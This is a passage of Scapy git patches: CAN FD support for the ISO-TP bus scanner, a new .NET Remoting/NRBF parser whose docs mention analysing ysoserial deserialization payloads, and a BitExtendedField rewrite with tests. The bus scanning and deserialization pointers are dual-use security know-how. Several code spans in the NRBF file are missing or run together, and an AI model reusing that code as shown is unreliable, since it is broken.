StreamSocket(sock, KerberosTCPHeader) return sock def send(self, pkt): From c8d88bbb66b3c3a20c496601e0603210da23f854 Mon Sep 17 00:00:00 2001 From: Nils Weiss Date: Fri, 6 Dec 2024 19:22:24 +0100 Subject: [PATCH 1396/1632] Support CANFD for ISOTPScan (#4574) --- scapy/contrib/isotp/isotp_scanner.py | 109 ++++++++++++++++++--------- test/contrib/isotpscan.uts | 20 ++--- 2 files changed, 82 insertions(+), 47 deletions(-) diff --git a/scapy/contrib/isotp/isotp_scanner.py b/scapy/contrib/isotp/isotp_scanner.py index 15a53cd8feb..5e35387b924 100644 --- a/scapy/contrib/isotp/isotp_scanner.py +++ b/scapy/contrib/isotp/isotp_scanner.py @@ -3,23 +3,15 @@ # See https://scapy.net/ for more information # Copyright (C) Nils Weiss # Copyright (C) Alexander Schroeder -import itertools -import json + # scapy.contrib.description = ISO-TP (ISO 15765-2) Scanner Utility # scapy.contrib.status = library + +import itertools +import json import logging import time - from threading import Event - -from scapy.packet import Packet -from scapy.compat import orb -from scapy.layers.can import CAN -from scapy.supersocket import SuperSocket -from scapy.contrib.cansocket import PYTHON_CAN -from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ - ISOTP_FF, ISOTP - # Typing imports from typing import ( Any, @@ -28,9 +20,18 @@ List, Optional, Tuple, - Union, + Union, Type, ) +from scapy.compat import orb +from scapy.contrib.cansocket import PYTHON_CAN +from scapy.contrib.isotp import ISOTPHeader_FD +from scapy.contrib.isotp.isotp_packet import ISOTPHeader, ISOTPHeaderEA, \ + ISOTP_FF, ISOTP, ISOTPHeaderEA_FD +from scapy.layers.can import CAN, CANFD +from scapy.packet import Packet +from scapy.supersocket import SuperSocket + log_isotp = logging.getLogger("scapy.contrib.isotp") @@ -55,22 +56,29 @@ def send_multiple_ext(sock, ext_id, packet, number_of_packets): sock.send(packet) -def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False): - # type: (int, bool, bool) -> Packet +def get_isotp_packet(identifier=0x0, extended=False, extended_can_id=False, fd=False): + # type: (int, bool, bool, bool) -> Packet """Craft ISO-TP packet :param identifier: identifier of crafted packet :param extended: boolean if packet uses extended address :param extended_can_id: boolean if CAN should use extended Ids + :param fd: boolean if CANFD packets should be used :return: Crafted Packet """ if extended: - pkt = ISOTPHeaderEA() / ISOTP_FF() # type: Packet + if fd: + pkt = ISOTPHeaderEA_FD() / ISOTP_FF() # type: Packet + else: + pkt = ISOTPHeaderEA() / ISOTP_FF() pkt.extended_address = 0 pkt.data = b'\x00\x00\x00\x00\x00' else: - pkt = ISOTPHeader() / ISOTP_FF() + if fd: + pkt = ISOTPHeader_FD() / ISOTP_FF() + else: + pkt = ISOTPHeader() / ISOTP_FF() pkt.data = b'\x00\x00\x00\x00\x00\x00' if extended_can_id: pkt.flags = "extended" @@ -170,7 +178,8 @@ def scan(sock, # type: SuperSocket sniff_time=0.1, # type: float extended_can_id=False, # type: bool verify_results=True, # type: bool - stop_event=None # type: Optional[Event] + stop_event=None, # type: Optional[Event] + fd=False # type: bool ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan and return dictionary of detections @@ -187,6 +196,7 @@ def scan(sock, # type: SuperSocket :param verify_results: Verify scan results. This will cause a second scan of all possible candidates for ISOTP Sockets :param stop_event: Event object to asynchronously stop the scan + :param fd: Use CANFD packets for scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] @@ -195,7 +205,7 @@ def scan(sock, # type: SuperSocket break if noise_ids and value in noise_ids: continue - sock.send(get_isotp_packet(value, False, extended_can_id)) + sock.send(get_isotp_packet(value, False, extended_can_id, fd)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, return_values, noise_ids, False, pkt), timeout=sniff_time, store=False) @@ -210,7 +220,7 @@ def scan(sock, # type: SuperSocket for value in retest_ids: if stop_event is not None and stop_event.is_set(): break - sock.send(get_isotp_packet(value, False, extended_can_id)) + sock.send(get_isotp_packet(value, False, extended_can_id, fd)) sock.sniff(prn=lambda pkt: get_isotp_fc(value, cleaned_ret_val, noise_ids, False, pkt), timeout=sniff_time * 10, store=False) @@ -225,7 +235,8 @@ def scan_extended(sock, # type: SuperSocket noise_ids=None, # type: Optional[List[int]] sniff_time=0.1, # type: float extended_can_id=False, # type: bool - stop_event=None # type: Optional[Event] + stop_event=None, # type: Optional[Event] + fd=False # type: bool ): # type: (...) -> Dict[int, Tuple[Packet, int]] """Scan with ISOTP extended addresses and return dictionary of detections @@ -243,6 +254,7 @@ def scan_extended(sock, # type: SuperSocket after sending a first frame :param extended_can_id: Send extended can frames :param stop_event: Event object to asynchronously stop the scan + :param fd: Use CANFD packets for scan :return: Dictionary with all found packets """ return_values = dict() # type: Dict[int, Tuple[Packet, int]] @@ -254,7 +266,7 @@ def scan_extended(sock, # type: SuperSocket continue pkt = get_isotp_packet( - value, extended=True, extended_can_id=extended_can_id) + value, extended=True, extended_can_id=extended_can_id, fd=fd) id_list = [] # type: List[int] for ext_isotp_id in range(r[0], r[-1], scan_block_size): if stop_event is not None and stop_event.is_set(): @@ -298,7 +310,8 @@ def isotp_scan(sock, # type: SuperSocket extended_can_id=False, # type: bool verify_results=True, # type: bool verbose=False, # type: bool - stop_event=None # type: Optional[Event] + stop_event=None, # type: Optional[Event] + fd=False # type: bool ): # type: (...) -> Union[str, List[SuperSocket]] """Scan for ISOTP Sockets on a bus and return findings @@ -329,6 +342,7 @@ def isotp_scan(sock, # type: SuperSocket of all possible candidates for ISOTP Sockets :param verbose: displays information during scan :param stop_event: Event object to asynchronously stop the scan + :param fd: Create CANFD frames :return: """ if verbose: @@ -337,9 +351,13 @@ def isotp_scan(sock, # type: SuperSocket log_isotp.info("Filtering background noise...") # Send dummy packet. In most cases, this triggers activity on the bus. + if fd: + dummy_pkt_cls = CANFD # type: Union[Type[CAN], Type[CANFD]] + else: + dummy_pkt_cls = CAN - dummy_pkt = CAN(identifier=0x123, - data=b'\xaa\xbb\xcc\xdd\xee\xff\xaa\xbb') + dummy_pkt = dummy_pkt_cls(identifier=0x123, + data=b'\xaa\xbb\xcc\xdd\xee\xff\xaa\xbb') background_pkts = sock.sniff( timeout=noise_listen_time, @@ -353,14 +371,16 @@ def isotp_scan(sock, # type: SuperSocket noise_ids=noise_ids, sniff_time=sniff_time, extended_can_id=extended_can_id, - stop_event=stop_event) + stop_event=stop_event, + fd=fd) else: found_packets = scan(sock, scan_range, noise_ids=noise_ids, sniff_time=sniff_time, extended_can_id=extended_can_id, verify_results=verify_results, - stop_event=stop_event) + stop_event=stop_event, + fd=fd) filter_periodic_packets(found_packets) @@ -379,14 +399,15 @@ def isotp_scan(sock, # type: SuperSocket extended_addressing) -def generate_text_output(found_packets, extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], bool) -> str +def generate_text_output(found_packets, extended_addressing=False, fd=False): + # type: (Dict[int, Tuple[Packet, int]], bool, bool) -> str """Generate a human readable output from the result of the `scan` or the `scan_extended` function. :param found_packets: result of the `scan` or `scan_extended` function :param extended_addressing: print results from a scan with ISOTP extended addressing + :param fd: set CANFD flag in output :return: human readable scan results """ if not found_packets: @@ -420,13 +441,16 @@ def generate_text_output(found_packets, extended_addressing=False): else: text += "\nNo Padding" + if fd: + text += "\nCANFD enabled" + text += "\n" return text def generate_code_output(found_packets, can_interface="iface", - extended_addressing=False): - # type: (Dict[int, Tuple[Packet, int]], Optional[str], bool) -> str + extended_addressing=False, fd=False): + # type: (Dict[int, Tuple[Packet, int]], Optional[str], bool, bool) -> str """Generate a copy&past-able output from the result of the `scan` or the `scan_extended` function. @@ -435,6 +459,7 @@ def generate_code_output(found_packets, can_interface="iface", used for the creation of the output. :param extended_addressing: print results from a scan with ISOTP extended addressing + :param fd: set CANFD flag in output :return: Python-code as string to generate all found sockets """ result = "" @@ -452,26 +477,29 @@ def generate_code_output(found_packets, can_interface="iface", send_ext = pack - (send_id * 256) ext_id = orb(found_packets[pack][0].data[0]) result += "ISOTPSocket(%s, tx_id=0x%x, rx_id=0x%x, padding=%s, " \ - "ext_address=0x%x, rx_ext_address=0x%x, " \ + "ext_address=0x%x, rx_ext_address=0x%x, fd=%s, " \ "basecls=ISOTP)\n" % \ (can_interface, send_id, int(found_packets[pack][0].identifier), found_packets[pack][0].length == 8, send_ext, - ext_id) + ext_id, + fd) else: - result += "ISOTPSocket(%s, tx_id=0x%x, rx_id=0x%x, padding=%s, " \ + result += "ISOTPSocket(%s, tx_id=0x%x, rx_id=0x%x, padding=%s, fd=%s, " \ "basecls=ISOTP)\n" % \ (can_interface, pack, int(found_packets[pack][0].identifier), - found_packets[pack][0].length == 8) + found_packets[pack][0].length == 8, + fd) return header + result def generate_json_output(found_packets, # type: Dict[int, Tuple[Packet, int]] can_interface="iface", # type: Optional[str] - extended_addressing=False # type: bool + extended_addressing=False, # type: bool + fd=False # type: bool ): # type: (...) -> str """Generate a list of ISOTPSocket objects from the result of the `scan` or @@ -482,6 +510,7 @@ def generate_json_output(found_packets, # type: Dict[int, Tuple[Packet, int]] used for the creation of the output. :param extended_addressing: print results from a scan with ISOTP extended addressing + :param fd: set CANFD flag in output :return: A list of all found ISOTPSockets """ socket_list = [] # type: List[Dict[str, Any]] @@ -501,6 +530,7 @@ def generate_json_output(found_packets, # type: Dict[int, Tuple[Packet, int]] "rx_id": dest_id, "rx_ext_address": dest_ext, "padding": pad, + "fd": fd, "basecls": ISOTP.__name__}) else: source_id = pack @@ -508,13 +538,15 @@ def generate_json_output(found_packets, # type: Dict[int, Tuple[Packet, int]] "tx_id": source_id, "rx_id": dest_id, "padding": pad, + "fd": fd, "basecls": ISOTP.__name__}) return json.dumps(socket_list) def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] can_interface, # type: Union[SuperSocket, str] - extended_addressing=False # type: bool + extended_addressing=False, # type: bool + fd=False # type: bool ): # type: (...) -> List[SuperSocket] """Generate a list of ISOTPSocket objects from the result of the `scan` or @@ -525,6 +557,7 @@ def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] used for the creation of the output. :param extended_addressing: print results from a scan with ISOTP extended addressing + :param fd: set CANFD flag in output :return: A list of all found ISOTPSockets """ from scapy.contrib.isotp import ISOTPSocket @@ -545,10 +578,12 @@ def generate_isotp_list(found_packets, # type: Dict[int, Tuple[Packet, int]] rx_id=dest_id, rx_ext_address=dest_ext, padding=pad, + fd=fd, basecls=ISOTP)) else: source_id = pack socket_list.append(ISOTPSocket(can_interface, tx_id=source_id, rx_id=dest_id, padding=pad, + fd=fd, basecls=ISOTP)) return socket_list diff --git a/test/contrib/isotpscan.uts b/test/contrib/isotpscan.uts index ac88be3ee15..85b8eae4759 100644 --- a/test/contrib/isotpscan.uts +++ b/test/contrib/isotpscan.uts @@ -208,9 +208,9 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ - "padding=False, basecls=ISOTP)\n" + "padding=False, fd=False, basecls=ISOTP)\n" s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ - "padding=False, basecls=ISOTP)\n" + "padding=False, fd=False, basecls=ISOTP)\n" assert s1 in result assert s2 in result @@ -235,9 +235,9 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock verbose=False) s1 = "\"iface\": \"can0\", \"tx_id\": 1538, \"rx_id\": 1794, " \ - "\"padding\": false, \"basecls\": \"ISOTP\"" + "\"padding\": false, \"fd\": false, \"basecls\": \"ISOTP\"" s2 = "\"iface\": \"can0\", \"tx_id\": 1539, \"rx_id\": 1795, " \ - "\"padding\": false, \"basecls\": \"ISOTP\"" + "\"padding\": false, \"fd\": false, \"basecls\": \"ISOTP\"" print(result) assert s1 in result assert s2 in result @@ -263,9 +263,9 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602), ISOTPSoftSocket(sock verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, " \ - "padding=False, basecls=ISOTP)\n" + "padding=False, fd=False, basecls=ISOTP)\n" s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, " \ - "padding=False, basecls=ISOTP)\n" + "padding=False, fd=False, basecls=ISOTP)\n" assert s1 not in result assert s2 in result @@ -292,9 +292,9 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x702, rx_id=0x602, ext_address=0x11, rx_ verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x602, rx_id=0x702, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + "ext_address=0x22, rx_ext_address=0x11, fd=False, basecls=ISOTP)" s2 = "ISOTPSocket(can0, tx_id=0x603, rx_id=0x703, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + "ext_address=0x22, rx_ext_address=0x11, fd=False, basecls=ISOTP)" assert s1 in result assert s2 in result @@ -321,9 +321,9 @@ with ISOTPSoftSocket(sock_recv1, tx_id=0x1ffff702, rx_id=0x1ffff602, ext_address verbose=False) s1 = "ISOTPSocket(can0, tx_id=0x1ffff602, rx_id=0x1ffff702, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + "ext_address=0x22, rx_ext_address=0x11, fd=False, basecls=ISOTP)" s2 = "ISOTPSocket(can0, tx_id=0x1ffff603, rx_id=0x1ffff703, padding=False, " \ - "ext_address=0x22, rx_ext_address=0x11, basecls=ISOTP)" + "ext_address=0x22, rx_ext_address=0x11, fd=False, basecls=ISOTP)" print(result) assert s1 in result assert s2 in result From 32a002fd66a08187dbf6683b33302ff9ea97a28d Mon Sep 17 00:00:00 2001 From: gpotter2 <10530980+gpotter2@users.noreply.github.com> Date: Wed, 11 Dec 2024 00:48:03 +0100 Subject: [PATCH 1397/1632] Add .NET Remoting / .NET Binary Formatter (#4606) --- doc/scapy/layers/dotnet.rst | 18 + scapy/fields.py | 117 +--- scapy/layers/ms_nrtp.py | 1038 ++++++++++++++++++++++++++++++++++ test/fields.uts | 125 +--- test/scapy/layers/msnrtp.uts | 155 +++++ 5 files changed, 1257 insertions(+), 196 deletions(-) create mode 100644 doc/scapy/layers/dotnet.rst create mode 100644 scapy/layers/ms_nrtp.py create mode 100644 test/scapy/layers/msnrtp.uts diff --git a/doc/scapy/layers/dotnet.rst b/doc/scapy/layers/dotnet.rst new file mode 100644 index 00000000000..fdfbbbe200a --- /dev/null +++ b/doc/scapy/layers/dotnet.rst @@ -0,0 +1,18 @@ +.NET Protocols +============== + +Scapy implements a few .NET specific protocols. Those protocols are a bit uncommon, but it can be useful to try to understand what's sent by .NET applications, or for more offensive purposes (issues with .NET deserialization for instance). + +.NET Remoting +------------- + +Implemented under ``ms_nrtp``, you can load it using:: + + from scapy.layers.ms_nrtp import * + +This supports: + +- The .NET remote protocol: ``NRTP*`` classes +- The .NET Binary Formatter: ``NRBF*`` classes + +For instance you can try to parse a .NET Remoting payload generated using ysoserial with the ``NRBF()`` to analyse what it's doing. diff --git a/scapy/fields.py b/scapy/fields.py index 06d73225589..a37a5df2659 100644 --- a/scapy/fields.py +++ b/scapy/fields.py @@ -3882,9 +3882,9 @@ def i2repr(self, return _EnumField.i2repr(self, pkt, x) -class BitExtendedField(Field[Optional[int], bytes]): +class BitExtendedField(Field[Optional[int], int]): """ - Bit Extended Field + Low E Bit Extended Field This type of field has a variable number of bytes. Each byte is defined as follows: @@ -3900,101 +3900,44 @@ class BitExtendedField(Field[Optional[int], bytes]): __slots__ = ["extension_bit"] - def prepare_byte(self, x): - # type: (int) -> int - # Moves the forwarding bit to the LSB - x = int(x) - fx_bit = (x & 2**self.extension_bit) >> self.extension_bit - lsb_bits = x & 2**self.extension_bit - 1 - msb_bits = x >> (self.extension_bit + 1) - x = (msb_bits << (self.extension_bit + 1)) + (lsb_bits << 1) + fx_bit - return x - - def str2extended(self, x=b""): - # type: (bytes) -> Tuple[bytes, Optional[int]] - # For convenience, we reorder the byte so that the forwarding - # bit is always the LSB. We then apply the same algorithm - # whatever the real forwarding bit position - - # First bit is the stopping bit at zero - bits = 0b0 - end = None - - # We retrieve 7 bits. - # If "forwarding bit" is 1 then we continue on another byte - i = 0 - for c in bytearray(x): - c = self.prepare_byte(c) - bits = bits << 7 | (int(c) >> 1) - if not int(c) & 0b1: - end = x[i + 1:] - break - i = i + 1 - if end is None: - # We reached the end of the data but there was no - # "ending bit". This is not normal. - return b"", None - else: - return end, bits - - def extended2str(self, x): - # type: (Optional[int]) -> bytes - if x is None: - return b"" - x = int(x) - s = [] - LSByte = True - FX_Missing = True - bits = 0b0 - i = 0 - while (x > 0 or FX_Missing): - if i == 8: - # End of byte - i = 0 - s.append(bits) - bits = 0b0 - FX_Missing = True - else: - if i % 8 == self.extension_bit: - # This is extension bit - if LSByte: - bits = bits | 0b0 << i - LSByte = False - else: - bits = bits | 0b1 << i - FX_Missing = False - else: - bits = bits | (x & 0b1) << i - x = x >> 1 - # Still some bits - i = i + 1 - s.append(bits) - - result = "".encode() - for x in s[:: -1]: - result = result + struct.pack(">B", x) - return result - def __init__(self, name, default, extension_bit): # type: (str, Optional[Any], int) -> None Field.__init__(self, name, default, "B") + assert extension_bit in [7, 0] self.extension_bit = extension_bit - def i2m(self, pkt, x): - # type: (Optional[Any], Optional[int]) -> bytes - return self.extended2str(x) - - def m2i(self, pkt, x): - # type: (Optional[Any], bytes) -> Optional[int] - return self.str2extended(x)[1] - def addfield(self, pkt, s, val): # type: (Optional[Packet], bytes, Optional[int]) -> bytes - return s + self.i2m(pkt, val) + val = self.i2m(pkt, val) + if not val: + return s + b"\0" + rv = b"" + mask = 1 << self.extension_bit + shift = (self.extension_bit + 1) % 8 + while val: + bv = (val & 0x7F) << shift + val = val >> 7 + if val: + bv |= mask + rv += struct.pack("!B", bv) + return s + rv def getfield(self, pkt, s): # type: (Optional[Any], bytes) -> Tuple[bytes, Optional[int]] - return self.str2extended(s) + val = 0 + smask = 1 << self.extension_bit + mask = 0xFF & ~ (1 << self.extension_bit) + shift = (self.extension_bit + 1) % 8 + i = 0 + while s: + val |= ((s[0] & mask) >> shift) << (7 * i) + if (s[0] & smask) == 0: # extension bit is 0 + # end + s = s[1:] + break + s = s[1:] + i += 1 + return s, self.m2i(pkt, val) class LSBExtendedField(BitExtendedField): diff --git a/scapy/layers/ms_nrtp.py b/scapy/layers/ms_nrtp.py new file mode 100644 index 00000000000..34c672f87be --- /dev/null +++ b/scapy/layers/ms_nrtp.py @@ -0,0 +1,1038 @@ +# SPDX-License-Identifier: GPL-2.0-or-later +# This file is part of Scapy +# See https://scapy.net/ for more information +# Copyright (C) Gabriel Potter + +""" +.NET RemoTing Protocol + +This implements: +- [MS-NRTP] - .NET Remoting Core Protocol +- [MS-NRBF] - .NET Remoting Binary Format +""" + +import enum +import functools +import struct + +from scapy.automaton import Automaton, ATMT +from scapy.config import conf +from scapy.main import interact +from scapy.fields import ( + ByteEnumField, + ByteField, + ConditionalField, + FieldLenField, + FieldListField, + FlagsField, + LEIntField, + LELongField, + LEShortEnumField, + LEShortField, + LESignedIntField, + LESignedLongField, + LESignedShortField, + LenField, + MSBExtendedField, + MultipleTypeField, + PacketField, + PacketListField, + SignedByteField, + StrField, + StrFixedLenField, + StrLenField, + StrLenFieldUtf16, +) +from scapy.packet import Packet +from scapy.supersocket import StreamSocket + + +# [MS-NRTP] sect 2.2.3.2.1 + + +class CountedString(Packet): + fields_desc = [ + ByteEnumField( + "StringEncoding", + 0, + { + 0: "Unicode", + 1: "UTF8", + }, + ), + FieldLenField("Length", None, fmt="= 2: + return cls.registered_headers.get( + struct.unpack("= 14: + cd = struct.unpack("= length: + # Get content-type + try: + content_type = next( + x.ContentTypeValue.StringData + for x in pkt.Headers + if x.HeaderToken == 6 + ) + session["content_type"] = content_type + except StopIteration: + # Not in this packet. Do we know it from the session? + content_type = session.get("content_type", None) + if not content_type: + return pkt + # We have a content-type. Parse it. + if content_type == b"application/octet-stream": + # pkt.payload is NRBF. + pkt.payload = NRBF(bytes(pkt.payload)) + return pkt + return None + + +# [MS-NRBF] .NET Remoting Binary Format + + +class MSBExtendedFieldLen(MSBExtendedField): + __slots__ = FieldLenField.__slots__ + + def __init__(self, name, default, length_of=None): + FieldLenField.__init__(self, name, default, length_of=length_of) + super(MSBExtendedFieldLen, self).__init__(name, default) + + i2m = FieldLenField.i2m + + +# [MS-NRBF] sect 2.1.1.6 + + +class NRBFLengthPrefixedString(Packet): + fields_desc = [ + MSBExtendedFieldLen("Length", None, length_of="String"), + StrLenField("String", b"", length_from=lambda pkt: pkt.Length), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-NRBF] sect 2.1.1.8 + + +class NRBFClassTypeInfo(Packet): + fields_desc = [ + PacketField("TypeName", NRBFLengthPrefixedString(), NRBFLengthPrefixedString), + LESignedIntField("LibraryId", 0), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-NRBF] sect 2.1.2.3 + + +class PrimitiveTypeEnum(enum.IntEnum): + Boolean = 1 + Byte = 2 + Char = 2 + Decimal = 5 + Double = 6 + Int16 = 7 + Int32 = 8 + Int64 = 9 + SByte = 10 + Single = 11 + TimeSpan = 12 + DateTime = 13 + UInt16 = 14 + UInt32 = 15 + UInt64 = 16 + Null = 17 + String = 18 + + +# [MS-NRBF] sect 2.1.2.2 + + +class BinaryTypeEnum(enum.IntEnum): + Primitive = 0 + String = 1 + Object = 2 + SystemClass = 3 + Class = 4 + ObjectArray = 5 + StringArray = 6 + PrimitiveArray = 7 + + +# [MS-NRBF] sect 2.2.2.1 + + +class NRBFValueWithCode(Packet): + fields_desc = [ + ByteEnumField("PrimitiveType", 0, PrimitiveTypeEnum), + MultipleTypeField( + [ + (ByteField("Value", 0), lambda pkt: pkt.PrimitiveType in [1, 2, 3, 4]), + (LESignedShortField("Value", 0), lambda pkt: pkt.PrimitiveType == 7), + (LESignedIntField("Value", 0), lambda pkt: pkt.PrimitiveType == 8), + (LESignedLongField("Value", 0), lambda pkt: pkt.PrimitiveType == 9), + (SignedByteField("Value", 0), lambda pkt: pkt.PrimitiveType == 10), + (LEShortField("Value", 0), lambda pkt: pkt.PrimitiveType == 14), + (LEIntField("Value", 0), lambda pkt: pkt.PrimitiveType == 15), + (LELongField("Value", 0), lambda pkt: pkt.PrimitiveType == 16), + ( + PacketField( + "Value", NRBFLengthPrefixedString(), NRBFLengthPrefixedString + ), + lambda pkt: pkt.PrimitiveType == 18, + ), + ], + StrFixedLenField("Value", b"", length=0), + ), + ] + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-NRBF] sect 2.2.2.2 + + +class NRBFStringValueWithCode(NRBFValueWithCode): + PrimitiveType = 18 + + +StringValueWithCode = lambda name: PacketField( + name, NRBFStringValueWithCode(), NRBFStringValueWithCode +) + + +# [MS-NRBF] sect 2.2.2.3 + + +class NRBFArrayOfValueWithCode(Packet): + fields_desc = [ + FieldLenField("Length", None, fmt="= pkt.MemberCount: + return None + if hasattr(pkt, "BinaryTypeEnums"): + if index < len(pkt.BinaryTypeEnums): + typeEnum = pkt.BinaryTypeEnums[index] + if typeEnum == BinaryTypeEnum.Primitive: + # Get AdditionalInfo to get the matching primitive type. + primitiveType = pkt.AdditionalInfos[ + sum( + 1 + for x in pkt.BinaryTypeEnums[:index] + if x + not in [ + BinaryTypeEnum.String, + BinaryTypeEnum.Object, + BinaryTypeEnum.ObjectArray, + BinaryTypeEnum.StringArray, + ] + ) + ].Value + return functools.partial( + NRBFMemberPrimitiveUnTyped, + type=PrimitiveTypeEnum(primitiveType), + ) + return NRBFRecord + + +class _NRBFMembers(Packet): + fields_desc = [ + PacketListField( + "Members", + [], + None, + next_cls_cb=_members_cb, + ) + ] + + +# [MS-NRBF] sect 2.3.1.1 + + +class NRBFClassInfo(Packet): + fields_desc = [ + LESignedIntField("ObjectId", 0), + PacketField("Name", NRBFLengthPrefixedString(), NRBFLengthPrefixedString), + FieldLenField("MemberCount", None, fmt="= index + ) + except StopIteration: + return None + typeEnum = BinaryTypeEnum(typeEnum) + # Return BinaryTypeEnum tainted with a pre-selected type. + return functools.partial( + NRBFAdditionalInfo, + type=typeEnum, + ) + + +class NRBFMemberTypeInfo(Packet): + fields_desc = [ + FieldListField( + "BinaryTypeEnums", + [], + ByteEnumField("", 0, BinaryTypeEnum), + count_from=lambda pkt: pkt.MemberCount, + ), + PacketListField( + "AdditionalInfos", + [], + None, + next_cls_cb=_member_type_infos_cb, + ), + ] + + +# [MS-NRBF] 2.3.2.5 + + +class NRBFClassWithId(NRBFRecord): + RecordTypeEnum = 1 + fields_desc = [ + NRBFRecord, + LESignedIntField("ObjectId", 0), + LESignedIntField("MetadataId", 0), + ] + + +# [MS-NRBF] sect 2.5.2 + + +class NRBFMemberPrimitiveUnTyped(Packet): + __slots__ = ["type"] + + fields_desc = [ + NRBFValueWithCode.fields_desc[1], + ] + + def __init__(self, _pkt=None, **kwargs): + self.type = kwargs.pop("type", PrimitiveTypeEnum.Byte) + assert isinstance(self.type, PrimitiveTypeEnum) + super(NRBFMemberPrimitiveUnTyped, self).__init__(_pkt, **kwargs) + + def clone_with(self, *args, **kwargs): + pkt = super(NRBFMemberPrimitiveUnTyped, self).clone_with(*args, **kwargs) + pkt.type = self.type + return pkt + + def copy(self): + pkt = super(NRBFMemberPrimitiveUnTyped, self).copy() + pkt.type = self.type + return pkt + + @property + def PrimitiveType(self): + return self.type + + def default_payload_class(self, payload): + return conf.padding_layer + + +# [MS-NRBF] sect 2.3.2.1 + + +class NRBFClassWithMembersAndTypes(NRBFRecord): + RecordTypeEnum = 5 + fields_desc = [ + NRBFRecord, + NRBFClassInfo, + NRBFMemberTypeInfo, + LESignedIntField("LibraryId", 0), + _NRBFMembers, + ] + + +# [MS-NRBF] sect 2.3.2.3 + + +class NRBFSystemClassWithMembersAndTypes(NRBFRecord): + RecordTypeEnum = 4 + fields_desc = [ + NRBFRecord, + NRBFClassInfo, + NRBFMemberTypeInfo, + _NRBFMembers, + ] + + +# [MS-NRBF] sect 2.3.2.4 + + +class NRBFSystemClassWithMembers(NRBFRecord): + RecordTypeEnum = 2 + fields_desc = [ + NRBFRecord, + NRBFClassInfo, + _NRBFMembers, + ] + + +# [MS-NRBF] sect 2.4.2.1 + + +class ArrayInfo(Packet): + fields_desc = [LEIntField("ObjectId", 0), LEIntField("Length", None)] + + +# [MS-NRBF] sect 2.4.3.2 + + +class NRBFArraySingleObject(NRBFRecord): + RecordTypeEnum = 16 + Length = 1 + fields_desc = [ + NRBFRecord, + ArrayInfo, + ] + + +# [MS-NRBF] sect 2.4.3.3 + + +def _values_singleprim_cb(pkt, lst, cur, remain): + index = len(lst) + (1 if cur is not None else 0) + if index >= pkt.Length: + return None + return functools.partial( + NRBFMemberPrimitiveUnTyped, + type=PrimitiveTypeEnum(pkt.PrimitiveTypeEnum), + ) + + +class NRBFArraySinglePrimitive(NRBFRecord): + RecordTypeEnum = 15 + fields_desc = [ + NRBFRecord, + ArrayInfo, + ByteEnumField("PrimitiveTypeEnum", 0, PrimitiveTypeEnum), + MultipleTypeField( + [ + ( + StrLenField("Values", [], length_from=lambda pkt: pkt.Length), + lambda pkt: pkt.PrimitiveTypeEnum == PrimitiveTypeEnum.Byte, + ) + ], + PacketListField( + "Values", + [], + next_cls_cb=_values_singleprim_cb, + max_count=1000, + ), + ), + ] + + def post_build(self, p, pay): + if self.Length is None: + p = p[:5] + struct.pack(" 0xff -data_254 = { - "extended": 0xff, - "str_with_fx" : [b'\x03\xfe', b'\x03\xfd', b'\x05\xfb', b'\x09\xf7', b'\x11\xef', b'\x21\xdf', b'\x41\xbf', b'\x81\x7f'] -} -for i in range(len(data_254['str_with_fx'])): - m = BitExtendedField("foo", None, extension_bit=i) - r = m.m2i(None, data_254["str_with_fx"][i]) - assert r == data_254['extended'] - -= BitExtendedField m2i: invalid field with no stopping bit -* 1 byte of one (no FX stop) shall return an error -for i in range(8): - m = BitExtendedField("foo", None, extension_bit=i) - r = m.m2i(None, b'\xff') - assert r == None +f = LSBExtendedField("a", 0) -= LSBExtendedField -* Test i2m and m2i -data_129 = { - "extended": 129, - "int_with_fx": 770, - "str_with_fx" : None -} -m = LSBExtendedField("foo", None) -r = m.i2m(None, data_129["extended"]) -data_129["str_with_fx"] = r -r = int(codecs.encode(r, 'hex'), 16) -assert r == data_129["int_with_fx"] - -m = LSBExtendedField("foo", None) -r = m.m2i(None, data_129["str_with_fx"]) -assert r == data_129["extended"] +assert f.addfield(None, b"", 1) == b"\x02" +assert f.addfield(None, b"", 127) == b"\xfe" +assert f.addfield(None, b"", 128) == b"\x01\x02" +assert f.addfield(None, b"", 536) == b"1\x08" +assert f.addfield(None, b"", 16383) == b"\xff\xfe" = MSBExtendedField * Test i2m and m2i -data_129 = { - "extended": 129, - "int_with_fx": 33025, - "str_with_fx" : None -} -m = MSBExtendedField("foo", None) -r = m.i2m(None, data_129["extended"]) -data_129["str_with_fx"] = r -r = int(codecs.encode(r, 'hex'), 16) -assert r == data_129["int_with_fx"] - -m = MSBExtendedField("foo", None) -r = m.m2i(None, data_129["str_with_fx"]) -assert r == data_129["extended"] + +f = MSBExtendedField("a", 0) + +assert f.addfield(None, b"", 1) == b"\x01" +assert f.addfield(None, b"", 127) == b"\x7f" +assert f.addfield(None, b"", 128) == b"\x80\x01" +assert f.addfield(None, b"", 536) == b"\x98\x04" +assert f.addfield(None, b"", 16383) == b"\xff\x7f" ############ diff --git a/test/scapy/layers/msnrtp.uts b/test/scapy/layers/msnrtp.uts new file mode 100644 index 